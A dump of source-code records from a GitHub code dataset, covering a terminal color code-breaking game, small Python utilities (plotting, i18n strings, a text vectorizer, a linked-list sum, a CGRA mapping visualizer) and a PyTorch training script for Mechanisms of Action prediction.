clear_screen()\n\n\ndef check_result_if(print_string, flag, count, attempt, key,\n choice, color_passcode):\n print(\"wait. . .\")\n time.sleep(2.5)\n clear_screen()\n game_board(color_passcode)\n print(Fore.BLUE + print_string)\n cal_score(count, flag)\n print(Fore.RESET)\n score_obj = Score(player_name, score, choice)\n score_obj.update()\n continue_to_main()\n\n\ndef check_result(count, attempt, key, choice, color_passcode):\n \"\"\"\n Checks result when user enters a guess,\n this function compares the user guess with\n the random code generated\n \"\"\"\n if count == attempt+1:\n print_string = f\"You ran out of attempts! Better luck next time...\\n\\n\"\n check_result_if(print_string, 1, count, attempt, key,\n choice, color_passcode)\n\n if clue[key][0] == choice+2:\n print_string = f\"CONGRATULATIONS! You broke the code in {count}\\\n attempt(s), Nice work!!!\\n\\n\"\n check_result_if(print_string, 0, count, attempt, key, choice,\n color_passcode)\n\n return False\n\n\ndef cal_score(count, flag):\n \"\"\"\n This function calculates the store based on the count of attempts\n a code is caracked or could not be cracked under 8 attempts\n \"\"\"\n global score\n if flag == 1:\n score = 0\n print(f\"Your score: {score} \")\n return score\n else:\n score = (10-(count-1))*10\n print(f\"Your score: {score} \")\n\n\ndef take_input(count, choice):\n \"\"\"\n Takes input (code guess) from the user\n \"\"\"\n length = choice + 2\n print(f\"\\nEnter code consisting of {length} colors.\")\n print(f\"Example -> r/R for Red, b/B for Blue with whitespace.\\\n Don't repeat colors.\")\n print(f\"Color choices: ['Red', 'Green', 'Blue', 'Purple',\\\n 'Yellow', 'White','Cyen']\")\n print(f\"For main menu -> type 'menu', to exit -> type 'exit'\\n\")\n while True:\n color_string = input('\\n').upper()\n color_code_list = color_string.split()\n\n if validate_input(color_code_list, length):\n break\n color_input = []\n for color in color_code_list:\n color_input.append(color_list_map[color])\n input_store[count] = color_input\n return color_input\n\n\ndef validate_input(color_code_list, length):\n \"\"\"\n Validates the color code input against duplicate values,\n non string values, more or less color codes then required\n \"\"\"\n flag_1 = 0\n flag_2 = 0\n if color_code_list == ['MENU']:\n continue_to_main()\n\n if color_code_list == ['EXIT']:\n sys.exit(0)\n try:\n if len(color_code_list) != length:\n raise ValueError(f\"Exactly {length} values required,\\\n you provided {len(color_code_list)}\")\n except ValueError as e:\n print(f\"Invalid input: \\n{e}! Type again...\\n\")\n return False\n for color in color_code_list:\n if color not in ['R', 'G', 'B', 'P', 'Y', 'W', 'C']:\n flag_1 = 1\n if flag_1 == 1:\n print(f\"Invalid input: \\nChoose as described in istructions!\\\n Type again...\\n\")\n return False\n\n for color in color_code_list:\n num = color_code_list.count(color)\n if num > 1:\n flag_2 = 1\n if flag_2 == 1:\n print(f\"Invalid input: \\nDo not repeat colors! Type again...\\n\")\n return False\n return True\n\n\ndef compare_colors(passcode, color_input, count):\n \"\"\"\n Compares the actual color code with user's guess to\n give clue to the user\n \"\"\"\n hit = 0\n miss = 0\n\n for color in color_input:\n if color in passcode:\n if color_input.index(color) == passcode.index(color):\n hit += 1\n else:\n miss += 1\n list_new = [hit, miss]\n clue[count] = list_new\n\n\ndef options_choice():\n \"\"\"\n Gives game level options to the user to choose\n \"\"\"\n welcome_banner()\n print(\"-\" * 20)\n print(\"Choose difficulty:\")\n print(\"-\" * 20)\n print()\n print(\"1 - \", end=\"\")\n print(Fore.YELLOW + \"Easy\" + Fore.RESET)\n print(\"2 - \", end=\"\")\n print(Fore.BLUE + \"Medium\" + Fore.RESET)\n print(\"3 - \", end=\"\")\n print(Fore.RED + \"Difficult\" + Fore.RESET)\n print(\"4 - \", end=\"\")\n print(Fore.MAGENTA + \"Scoreboard\" + Fore.RESET)\n print(\"5 - \", end=\"\")\n print(Fore.GREEN + \"Exit Game\" + Fore.RESET)\n\n print(\"Enter your choice by pressing '1', '2', '3' ,'4' or '5':\")\n while True:\n key = input('\\n')\n if key in ['1', '2', '3', '4', '5']:\n break\n else:\n print(\"Invalid input, choose again!\")\n if (int(key) == 4):\n leaderboard()\n return 0\n if (int(key) == 5):\n sys.exit(0)\n clear_screen()\n return int(key)\n\n\ndef main():\n \"\"\"\n Main function to start the game\n \"\"\"\n clear_screen()\n reset_variables()\n choice = options_choice()\n color_passcode = create_color_code(color_list, choice)\n guess_attempts(attempts, unknown, color_passcode, choice)\n\n\ndef welcome():\n \"\"\"\n Welcome function to display welcome heading and instruction\n \"\"\"\n welcome_banner()\n\n if player_namef():\n clear_screen()\n welcome_banner()\n print(\"\\n\")\n pname = '{:^80}'\n print(\"*\" * 80)\n print()\n print(Fore.RED + pname.format('welcome ' + player_name + '!!!')\n + Fore.RESET)\n print()\n print(\"*\" * 80)\n print()\n while True:\n print(\"Press 'I' or 'i' for Instructions.\")\n print(\"Press 'M' or 'm' for Game menu.\")\n rkey = input('\\n')\n if rkey.upper() == 'I':\n clear_screen()\n print(\"\"\"\nYou have to crack the color code in as few attempts\nas possible. There are total of 8 attempts.\nThe color code will be consisting of either 3, 4, or\\\n5 colors , depending on the difficulty\nof the game you choose (Easy, Medium or Difficult).\n\nEasy : Green White Yellow\nMedium: White Yellow Red Blue\nDifficult: Green White Red Purple Blue\n\nYou will be asked to enter your color code guess.\nYou will be told how close you are if you don't get the exact code\n\nHit -> If you get a right color on exact position\nMiss-> If you get the right color but on different position\n\nIf you get the color code exactly right you have won the game.\nGOOD LUCK !!! \"\"\")\n print()\n break\n elif rkey.upper() == 'M':\n main()\n else:\n print(\"Invalid input! Try again\")\n continue_to_main()\n\n\nwelcome()\n","repo_name":"Sadaf-Tariq/pp3-color-code-breaker","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":12647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24887668550","text":"import sys\nimport numpy as np\n# np.set_printoptions(threshold=sys.maxsize)\nnp.set_printoptions(suppress=True)\n\n\narr = np.array([3, 4, 21, 36, 10, 28, 35, 5, 24, 42])\n\n# print(type(arr))\nmaxIt = np.where(arr == np.amax(arr))\n\n# print(maxIt[0])\n\nres = ' '.join(map(str, maxIt[0]))\nprint(res)\n\n\n\n","repo_name":"ybgirgin3/hackerrank-solutions","sub_path":"Algorithm_w_Python/breakingRecords/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"703982098","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport csv\nimport math\n\ndef plot_log(filename, show=True):\n # load data\n keys = []\n values = []\n with open(filename, 'r') as f:\n reader = csv.DictReader(f)\n for row in reader:\n if keys == []:\n for key, value in row.items():\n keys.append(key)\n values.append(float(value))\n continue\n\n for _, value in row.items():\n values.append(float(value))\n\n values = np.reshape(values, newshape=(-1, len(keys)))\n values[:,0] += 1\n\n fig = plt.figure(figsize=(4,6))\n fig.subplots_adjust(top=0.95, bottom=0.05, right=0.95)\n fig.add_subplot(211)\n for i, key in enumerate(keys):\n if key.find('loss') >= 0 and not key.find('val') >= 0: # training loss\n plt.plot(values[:, 0], values[:, i], label=key)\n plt.legend()\n plt.title('Training loss')\n\n fig.add_subplot(212)\n for i, key in enumerate(keys):\n if key.find('acc') >= 0: # acc\n plt.plot(values[:, 0], values[:, i], label=key)\n plt.legend()\n plt.title('Training and validation accuracy')\n\n # fig.savefig('result/log.png')\n if show:\n plt.show()\n\n\ndef combine_images(generated_images):\n num = generated_images.shape[0]\n width = int(math.sqrt(num))\n height = int(math.ceil(float(num)/width))\n shape = generated_images.shape[1:3]\n image = np.zeros((height*shape[0], width*shape[1]),\n dtype=generated_images.dtype)\n for index, img in enumerate(generated_images):\n i = int(index/width)\n j = index % width\n image[i*shape[0]:(i+1)*shape[0], j*shape[1]:(j+1)*shape[1]] = \\\n img[:, :, 0]\n return image\n\nif __name__==\"__main__\":\n plot_log('result/log.csv')","repo_name":"TarrySingh/Artificial-Intelligence-Deep-Learning-Machine-Learning-Tutorials","sub_path":"deep-learning/CapsNET/Keras_Implementation/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":3543,"dataset":"github-code","pt":"43"} +{"seq_id":"30249981772","text":"# -*- coding: utf-8 -*-\r\n###########################################\r\n# Auther:FeatherMountain(https://3wa.tw) #\r\n# Version: 0.1_Custom #\r\n# Date: 2022-12-02 #\r\n# License: MIT #\r\n###########################################\r\n# # how to :\r\n# import myi18n\r\n# i18n = myi18n.kit()\r\n# i18n.auto(str) \r\n# 自動判斷 = locale.getpreferredencoding()\r\n# 如果不是 cp950,切換成英文版\r\nimport locale\r\nclass kit: \r\n LOCALE_ENCODING = ''\r\n def __init__(self):\r\n self.LOCALE_ENCODING = locale.getpreferredencoding() \r\n #print \"myi18n __init__\"\r\n #print self.LOCALE_ENCODING # 這裡正常是 cp950\r\n pass\r\n def auto(self,s):\r\n if self.LOCALE_ENCODING == \"cp950\" or self.LOCALE_ENCODING == \"950\":\r\n return s\r\n if self.data.has_key(s):\r\n return self.data[s]\r\n else:\r\n return s\r\n data = {\r\n \"打字音啟動\":\"Enable Typing Sound\",\r\n \"正常出字模式\":\"Normal Mode\",\r\n \"BIG5模式\":\"BIG5 Mode\",\r\n \"複製貼上模式\":\"Copy/Paste Mode\",\r\n \"1.關於肥米輸入法\":\"1. About UCLLIU Input Method\",\r\n \"2.切換至「遊戲模式」\":\"2. Switch to \\\"Game Mode\\\"\",\r\n \"2.切換至「正常模式」\":\"2. Switch to \\\"Normal Mode\\\"\", \r\n \"3.選擇出字模式\":\"3. Sendkeys Mode\",\r\n \"【●】短版模式\":\"[ o ] UI/UX Short\",\r\n \"【 】短版模式\":\"[ ] UI/UX Short\",\r\n \"【,,,+】畫面加大\":\"[ ,,,+ ] UI/UX Increase\",\r\n \"【,,,-】畫面縮小\":\"[ ,,,- ] UI/UX Minify\",\r\n \"英數時透明度\":\"En Mode Transparency\",\r\n \"肥模式透明度\":\"UCL Mode Transparency\",\r\n \"4.畫面調整\":\"4. UI Adjustment\",\r\n \"5.【●】使用 CTRL+SPACE 切換輸入法\":\"5. [ o ] Switch Input Method By CTRL+SPACE\",\r\n \"5.【 】使用 CTRL+SPACE 切換輸入法\":\"5. [ ] Switch Input Method By CTRL+SPACE\",\r\n \"6.【●】顯示短根\":\"6. [ o ] Diplay [SP] Shortest Character\",\r\n \"6.【 】顯示短根\":\"6. [ ] Diplay [SP] Shortest Character\",\r\n \"7.【●】顯示提示注音\":\"7. [ o ] Diplay [Prompt phonetic]\",\r\n \"7.【 】顯示提示注音\":\"6. [ ] Diplay [Prompt phonetic]\",\r\n \"】\":\" ]\",\r\n \"【\":\"[ \",\r\n \"●\":\"o\",\r\n \" \":\" \",\r\n \"8.打字音\":\"8. Typing sound\",\r\n \"肥米輸入法:\":\"UCLLIU Input Method: \",\r\n \"9.【●】啟動預設為「肥」模式\":\"9. [ o ] Boot default to \\\"UCL\\\" mode\",\r\n \"9.【 】啟動預設為「肥」模式\":\"9. [ ] Boot default to \\\"UCL\\\" mode\",\r\n \"10. 離開(Quit)\":\"9. Quit\" \r\n }","repo_name":"shadowjohn/UCL_LIU","sub_path":"myi18n.py","file_name":"myi18n.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"43"} +{"seq_id":"32118251323","text":"import matplotlib.pyplot as plt\nimport matplotlib.patches as pat\nimport networkx as nx\n\nfrom mapping import *\n\n# reference: GenMap ConfDrawer.py\n# https://github.com/hal-lab-u-tokyo/GenMap/blob/master/ConfDrawer.py\n\n# drawing setting\npe_margin = 0.15\npe_color = \"skyblue\"\nalu_scale = 0.3\nalu_color = \"lightcoral\"\npe_size = 1 - pe_margin * 2\narrow_setting = dict(facecolor='black', width=0.8,\n headwidth=4.0, headlength=4.0, shrink=0.01)\n\n\nclass Visualizer():\n @staticmethod\n def visualize_mapping(mapping: Mapping, output_dir: str):\n fig = plt.figure(figsize=(mapping.column_num *\n mapping.context_size, mapping.row_num))\n\n for context_id in range(mapping.context_size):\n Visualizer.visualize_mapping_one_context(mapping, context_id, fig)\n\n plt.savefig(output_dir + \"/result.png\")\n\n @staticmethod\n def visualize_mapping_one_context(mapping: Mapping, context_id: int, fig):\n ax = fig.add_subplot(1, mapping.context_size, context_id + 1)\n ax.set_xbound(0, mapping.column_num)\n ax.set_ybound(0, mapping.row_num)\n plt.tick_params(labelbottom=False, labelleft=False, labelright=False,\n labeltop=False, bottom=False, left=False, right=False, top=False)\n\n row_num = mapping.row_num\n column_num = mapping.column_num\n\n def create_PE_id(column_id, row_id):\n return column_id * 100 + row_id\n\n def create_xy_from_row_id_and_column_id(row_id, column_id, row_num):\n return (column_id, row_num - 1 - row_id)\n\n PE_id_to_patch = {}\n\n for row_id in range(row_num):\n for column_id in range(column_num):\n tmp_PE_config = mapping.PE_array[row_id][column_id].config_list[context_id]\n\n x, y = create_xy_from_row_id_and_column_id(row_id, column_id, row_num)\n\n # add PE and opcode\n PE_operation_type = tmp_PE_config.operation_type\n if PE_operation_type != OperationType.Nop:\n color = pe_color\n op_name = tmp_PE_config.operation_name\n ax.annotate(op_name, xy=(x + 1 - pe_margin * 3,\n y + 1 - pe_margin * 2), size=12)\n else:\n color = \"white\"\n pe = Visualizer.__make_PE_patch((x, y), color)\n ax.add_patch(pe)\n\n # add ALU\n alu = Visualizer.__make_ALU_patch((x, y))\n ax.add_patch(alu)\n\n PE_id = create_PE_id(row_id, column_id)\n PE_id_to_patch[PE_id] = alu\n\n for row_id in range(row_num):\n for column_id in range(column_num):\n x, y = create_xy_from_row_id_and_column_id(row_id, column_id, row_num)\n tmp_PE_id = create_PE_id(row_id, column_id)\n tmp_PE_patch = PE_id_to_patch[tmp_PE_id]\n tmp_PE_config = mapping.PE_array[row_id][column_id].config_list[context_id]\n\n for from_config_id in tmp_PE_config.from_config_id:\n from_PE_id = create_PE_id(\n from_config_id.row_id, from_config_id.column_id)\n from_PE_patch = PE_id_to_patch[from_PE_id]\n ax.annotate(\"\", xy=Visualizer.__get_center(tmp_PE_patch),\n xytext=Visualizer.__get_center(from_PE_patch),\n arrowprops=arrow_setting)\n\n @staticmethod\n def __make_PE_patch(coord, color):\n \"\"\"Makes a square for PE\n Args:\n coord (tuple): coordinate of the PE\n color (str): color of the PE\n Returns:\n patch of matplotlib: a square\n \"\"\"\n x, y = coord\n return pat.Rectangle(xy=(x + pe_margin, y + pe_margin),\n width=pe_size, height=pe_size,\n angle=0, facecolor=color, edgecolor=\"black\")\n\n @staticmethod\n def __make_ALU_patch(coord):\n \"\"\"Makes a patch for ALU\n Args:\n coord (tuple): coordinate of the PE\n Returns:\n patch of matplotlib: an ALU\n \"\"\"\n pos = (coord[0] + 0.5, coord[1] + 0.4)\n x = [0.0, 0.4, 0.5, 0.6, 1.0, 0.8, 0.2]\n y = [0.0, 0.0, 0.2, 0.0, 0.0, 0.7, 0.7, 0.0]\n\n x = [v * alu_scale + pos[0] for v in x]\n y = [v * alu_scale + pos[1] for v in y]\n\n return pat.Polygon(xy=list(zip(x, y)), color=alu_color)\n\n @staticmethod\n def __get_center(patch):\n \"\"\"Calculates center coordinate of patch\n \"\"\"\n if isinstance(patch, plt.Rectangle):\n width = patch.get_width()\n height = patch.get_width()\n x = patch.get_x()\n y = patch.get_y()\n return (x + width / 2, y + height / 2)\n elif isinstance(patch, pat.RegularPolygon):\n return patch.xy\n else:\n xy = patch.get_xy()\n x_list = [x for x, y in xy]\n y_list = [y for x, y in xy]\n min_x = min(x_list)\n max_x = max(x_list)\n min_y = min(y_list)\n max_y = max(y_list)\n return (min_x + (max_x - min_x) / 2, min_y + (max_y - min_y) / 2)\n","repo_name":"hal-lab-u-tokyo/elastic_cgra_mapper","sub_path":"visualizer/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":5292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40378722073","text":"#\n\"\"\"\nTextVectorizer\n\nJust like TFIDFVectorizer\n\"\"\"\n\nfrom copy import deepcopy\nfrom collections import Counter\nimport numpy as np\nfrom sklearn.base import BaseEstimator\nfrom tqdm import tqdm\n\n\nPAD = ''\nSOS = ''\nEOS = ''\nUNK = ''\n\n\nclass TextVectorizer(BaseEstimator):\n \"\"\"\n https://scikit-learn.org/stable/modules/generated/sklearn.base.BaseEstimator.html#sklearn.base.BaseEstimator\n \"\"\"\n\n def __init__(self, **param):\n self.word2ind = {}\n self.ind2word = {\n 0: PAD,\n 1: SOS,\n 2: EOS,\n 3: UNK,\n }\n self.length = len(self.ind2word)\n self.set_params(**param)\n\n def get_params(self, deep=False):\n if deep:\n return deepcopy(self.params)\n return self.params\n\n def set_params(self, **params):\n self.params = {\n 'verbose': 0,\n 'max_len': None,\n 'max_features': None,\n }\n for k in params:\n self.params[k] = params[k]\n\n def fit(self, raw_documents, y=None):\n max_features = self.params.get('max_features', None)\n verbose = self.params.get('verbose', 0)\n if verbose:\n raw_documents = tqdm(raw_documents)\n counter = Counter()\n for doc in raw_documents:\n counter.update([\n word for word in doc.split(' ')\n if word\n ])\n if isinstance(max_features, int):\n counter = counter.most_common(max_features)\n else:\n counter = list(counter.items())\n for word, _ in counter:\n self.word2ind[word] = self.length\n self.ind2word[self.length] = word\n self.length += 1\n\n def fit_transform(self, raw_documents, y=None):\n self.fit(raw_documents)\n return self.transform(raw_documents)\n\n def __len__(self):\n return self.length\n\n def transform(self, raw_documents, copy=False):\n verbose = self.params.get('verbose', 0)\n gen = self.transform_generator(\n raw_documents, batch_size=1, forever=False)\n if verbose:\n gen = tqdm(gen)\n ret = []\n for x in gen:\n ret.append(x[0])\n return np.array(ret)\n\n def transform_generator(self, raw_documents, batch_size=32, forever=True):\n max_len = self.params.get('max_len', None)\n batch = []\n while True:\n for doc in raw_documents:\n sent = []\n for word in doc.split(' '):\n if word:\n if word in self.word2ind:\n sent.append(self.word2ind[word])\n else:\n sent.append(3)\n if max_len and len(sent) < max_len:\n sent += [0] * (max_len - len(sent))\n batch.append(np.array(sent))\n if len(batch) >= batch_size:\n yield np.array(batch)\n batch = []\n if not forever:\n break\n\n def inverse_transform(self, X):\n ret = []\n for x in X:\n sent = []\n for xx in x:\n if xx > 0 and xx in self.ind2word:\n sent.append(self.ind2word[xx])\n ret.append(sent)\n return ret\n\n\nif __name__ == '__main__':\n docs = [\n 'I love you',\n 'I hate you very much',\n 'I need you',\n ]\n tv = TextVectorizer()\n tv.fit(docs)\n embs = tv.transform(docs)\n print(embs)\n iembs = tv.inverse_transform(embs)\n print(iembs)\n\n tv = TextVectorizer(verbose=1, max_len=5)\n tv.fit(docs)\n embs = tv.transform(docs)\n print(embs)\n iembs = tv.inverse_transform(embs)\n print(iembs)\n\n tv = TextVectorizer(verbose=1, max_len=5, max_features=2)\n tv.fit(docs)\n\n for i, x in enumerate(tv.transform_generator(docs, batch_size=2)):\n print(x)\n if i >= 2:\n break\n","repo_name":"deepdialog/text-vectorizer","sub_path":"text_vectorizer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"22679622368","text":"#Sum List\r\nclass ListNode(object):\r\n def __init__(self, x):\r\n self.data = x\r\n self.next = None\r\n\r\n def print_list(self):\r\n curr = self\r\n s = \"\"\r\n while curr is not None:\r\n s += str(curr.data) + \"-> \"\r\n curr = curr.next\r\n print(s)\r\n\r\ndef sum_list(l1, l2):\r\n place = 0\r\n carry = 0\r\n c1 = l1\r\n c2 = l2\r\n total = 0\r\n while c1 is not None or c2 is not None:\r\n temp = 0\r\n if c1 is not None:\r\n temp += c1.data\r\n c1 = c1.next\r\n if c2 is not None:\r\n temp += c2.data\r\n c2 = c2.next\r\n if carry == 1:\r\n temp += carry\r\n carry = 0\r\n\r\n if temp >= 10:\r\n temp -= 10\r\n carry = 1\r\n total += temp*(10**place)\r\n place += 1\r\n\r\n total += carry*(10**place)\r\n \r\n return total\r\n\r\nl1 = ListNode(9)\r\nl1.next = ListNode(9)\r\nl1.next.next = ListNode(9)\r\n\r\nl2 = ListNode(1)\r\n\r\nprint(sum_list(l1, l2))\r\n","repo_name":"shlokKh/interview-practice","sub_path":"chapter2/p5.py","file_name":"p5.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15681474390","text":"\"\"\"aggregate two logs `data1` and `data2` and log to tensorboard\"\"\"\n\nimport sys;\n\nsys.path.append(\"../../\")\n\nfrom booster import Aggregator, Diagnostic\nfrom torch.utils.tensorboard import SummaryWriter\nfrom booster.utils import logging_sep\n\n# create data\ndata1 = {'loss': {'nll': 0.1, 'kl': 0.5}, 'other': {'ex1': 0.3}}\ndata2 = {'loss': {'nll': 0.3, 'kl': 0.7}, 'other': {'ex1': 0.5}}\n\n# create a diagnostic object for data1\ndiag1 = Diagnostic(data1)\n\n# create a diagnostic object for data2\ndiag2 = Diagnostic()\ndiag2.update(data2)\n\n# create an aggregator\nagg = Aggregator()\n\n# leaf average of diag1 and diag2\nagg.update(diag1)\nagg.update(diag2)\n\n# return moving average and move to CPU\nsummary = agg.data.to('cpu')\n\n# print resulting summary\nprint(logging_sep())\nprint(summary)\nprint(logging_sep())\n\n# log to tensorboard\nwriter = SummaryWriter(log_dir=\"../../tensorboard\")\nsummary.log(writer, 1)\n","repo_name":"vlievin/booster-pytorch","sub_path":"examples/datastruct/scalars.py","file_name":"scalars.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"25283507394","text":"def check(s):\n st = list()\n for i in s:\n if i.lower() not in st and i.isalpha():\n st.append(i.lower())\n #print(st)\n return len(st)==26\nn = input()\nif check(n):\n print(\"YES\")\nelse:\n print(\"NO\")","repo_name":"snaprick/PP2_20BD","sub_path":"TSIS6/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"16690531084","text":"\"\"\"\nScript for training a model for the Mechanisms of Action (MoA) prediction task.\nThis script uses a simple feed-forward neural network model, PyTorch as the backend, and cross-validation for better model performance.\n\"\"\"\nimport json\nimport click\nimport torch\nfrom torch import nn\nimport torch.optim as optim\nfrom torch.utils.data import Dataset, DataLoader\nimport numpy as np\nimport pandas as pd\nfrom pathlib import Path\nimport torch.nn.functional as F\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nimport logging\nfrom typing import Dict, List\nfrom torch.utils.tensorboard import SummaryWriter\n\n# setting up logs\nlogging.basicConfig(level=logging.INFO)\nwriter = SummaryWriter(\"logs\")\n\n# Define constants\nINPUT_PATH = \"data/processed\"\nOUTPUT_PATH = \"models\"\nBATCH_SIZE = 64\nLR = 0.001\nN_EPOCHS = 2\nFOLDS = [0, 1, 2, 3, 4] # Folds to use for cross-validation\nMODEL_CONFIG = {\"layer1_size\": 1024, \"layer2_size\": 2048}\n\n\ndef prepare_data(input_path: Path, fold_id: int):\n train_df: pd.DataFrame = pd.read_csv(input_path / f\"train_fold{fold_id}.csv\")\n valid_df: pd.DataFrame = pd.read_csv(input_path / f\"valid_fold{fold_id}.csv\")\n\n # Drop column 1 which only has \"trt_cp\" values\n train_df = train_df.drop(columns=train_df.columns[1])\n valid_df = valid_df.drop(columns=valid_df.columns[1])\n\n # Separate features and targets\n train_features: np.ndarray = train_df.iloc[:, 1:875].values\n train_targets: np.ndarray = train_df.iloc[:, 875:].values\n\n valid_features: np.ndarray = valid_df.iloc[:, 1:875].values\n valid_targets: np.ndarray = valid_df.iloc[:, 875:].values\n\n return train_features, train_targets, valid_features, valid_targets\n\n\nclass MoaDataset(Dataset):\n def __init__(self, features: np.array, targets: np.array):\n self.features = features\n self.targets = targets\n\n def __len__(self) -> int:\n return self.features.shape[0]\n\n def __getitem__(self, idx: int) -> Dict[str, torch.Tensor]:\n dct = {\n \"x\": torch.tensor(self.features[idx, :], dtype=torch.float),\n \"y\": torch.tensor(self.targets[idx, :], dtype=torch.float),\n }\n return dct\n\n\nclass MoaModel(nn.Module):\n def __init__(\n self, num_features: int, num_targets: int, layer1_size: int, layer2_size: int\n ):\n super(MoaModel, self).__init__()\n self.layer1 = nn.Linear(num_features, layer1_size)\n self.layer2 = nn.Linear(layer1_size, layer2_size)\n self.layer3 = nn.Linear(layer2_size, num_targets)\n\n def forward(self, inputs: torch.Tensor) -> torch.Tensor:\n x = F.relu(self.layer1(inputs))\n x = F.relu(self.layer2(x))\n x = self.layer3(x)\n return x\n\n\n# ResNet model\nclass ResBlock(nn.Module):\n def __init__(\n self, in_features: int, out_features: int, dropout_rate: float = 0.0\n ) -> None:\n super(ResBlock, self).__init__()\n self.lin1 = nn.Linear(in_features, out_features)\n self.lin2 = nn.Linear(out_features, in_features)\n self.dropout = nn.Dropout(dropout_rate)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n residual = x\n out = F.relu(self.lin1(x))\n out = self.dropout(out)\n out = self.lin2(out)\n out += residual\n return out\n\n\nclass ResNet(nn.Module):\n def __init__(self, num_features: int, num_targets: int, layer_sizes: List[int]):\n super(ResNet, self).__init__()\n layers = []\n layers.append(nn.Linear(num_features, layer_sizes[0]))\n for i in range(len(layer_sizes) - 1):\n layers.append(ResBlock(layer_sizes[i], layer_sizes[i + 1]))\n layers.append(nn.Linear(layer_sizes[-1], num_targets))\n self.model = nn.Sequential(*layers)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n return self.model(x)\n\n\ndef train_model(\n model: nn.Module,\n dataloader: DataLoader,\n criterion: nn.Module,\n optimizer: optim.Optimizer,\n device: torch.device,\n) -> float:\n model.train()\n total_loss = 0\n\n for data in dataloader:\n optimizer.zero_grad()\n inputs = data[\"x\"].to(device)\n targets = data[\"y\"].to(device)\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n loss.backward()\n optimizer.step()\n total_loss += loss.item() * inputs.size(0)\n\n epoch_loss = total_loss / len(dataloader.dataset)\n return epoch_loss\n\n\ndef evaluate_model(\n model: nn.Module, dataloader: DataLoader, criterion: nn.Module, device: torch.device\n) -> float:\n model.eval()\n total_loss = 0\n\n for data in dataloader:\n inputs = data[\"x\"].to(device)\n targets = data[\"y\"].to(device)\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n total_loss += loss.item() * inputs.size(0)\n\n epoch_loss = total_loss / len(dataloader.dataset)\n return epoch_loss\n\n\ndef run_training(\n model: nn.Module,\n train_dataloader: DataLoader,\n valid_dataloader: DataLoader,\n criterion: nn.Module,\n optimizer: optim.Optimizer,\n device: torch.device,\n num_epochs: int,\n model_path: str,\n):\n best_valid_loss = float(\"inf\")\n scheduler = ReduceLROnPlateau(optimizer, \"min\", patience=3, factor=0.1)\n\n for epoch in range(num_epochs):\n train_loss = train_model(model, train_dataloader, criterion, optimizer, device)\n valid_loss = evaluate_model(model, valid_dataloader, criterion, device)\n logging.info(\n f\"Epoch {epoch+1} / {num_epochs} - Train Loss: {train_loss} - Valid Loss: {valid_loss}\"\n )\n\n # Write to tensorboard\n writer.add_scalars(\"Loss\", {\"train\": train_loss, \"valid\": valid_loss}, epoch)\n\n # learning rate scheduler\n scheduler.step(valid_loss)\n\n # Save model parameters if validation loss improved\n if valid_loss < best_valid_loss:\n best_valid_loss = valid_loss\n torch.save(\n {\n \"epoch\": epoch,\n \"model_state_dict\": model.state_dict(),\n \"optimizer_state_dict\": optimizer.state_dict(),\n \"loss\": valid_loss,\n },\n model_path,\n )\n logging.info(\n f\"Saved model parameters to {model_path}. Validation loss: {valid_loss}\"\n )\n\n\ndef make_model(\n model_name: str, num_features: int, num_targets: int, model_config: Dict\n):\n if model_name == \"MoaModel\":\n model = MoaModel(\n num_features,\n num_targets,\n model_config[\"layer1_size\"],\n model_config[\"layer2_size\"],\n )\n elif model_name == \"ResNet\":\n model = ResNet(num_features, num_targets, model_config[\"layer_sizes\"])\n else:\n raise Exception(f\"Unknown model: {model_name}\")\n return model\n\n\n@click.command()\n@click.option(\n \"--model_name\", type=click.Choice([\"MoaModel\", \"ResNet\"], case_sensitive=False)\n)\n@click.option(\"--config\", type=click.Path(exists=True))\ndef main(model_name: str, config: str):\n for fold_id in FOLDS:\n train_features, train_targets, valid_features, valid_targets = prepare_data(\n Path(INPUT_PATH), fold_id\n )\n\n # Now use this data with the Dataset, Dataloader and Model\n train_dataset = MoaDataset(train_features, train_targets)\n valid_dataset = MoaDataset(valid_features, valid_targets)\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n num_features = train_features.shape[1]\n num_targets = train_targets.shape[1]\n # print(f\"Number of features: {num_features}\")\n # print(f\"Number of targets: {num_targets}\")\n\n # Load model configuration\n with open(config, \"r\") as f:\n model_config = json.load(f)\n\n model = make_model(model_name, num_features, num_targets, model_config)\n model.to(device)\n\n train_dataloader = DataLoader(train_dataset, batch_size=64, shuffle=True)\n valid_dataloader = DataLoader(valid_dataset, batch_size=64, shuffle=False)\n\n criterion = nn.BCEWithLogitsLoss()\n optimizer = optim.Adam(model.parameters(), lr=0.001)\n\n run_training(\n model,\n train_dataloader,\n valid_dataloader,\n criterion,\n optimizer,\n device,\n num_epochs=N_EPOCHS,\n model_path=f\"{OUTPUT_PATH}/{model_name}_fold{fold_id}.pth\",\n )\n\n\nif __name__ == \"__main__\":\n 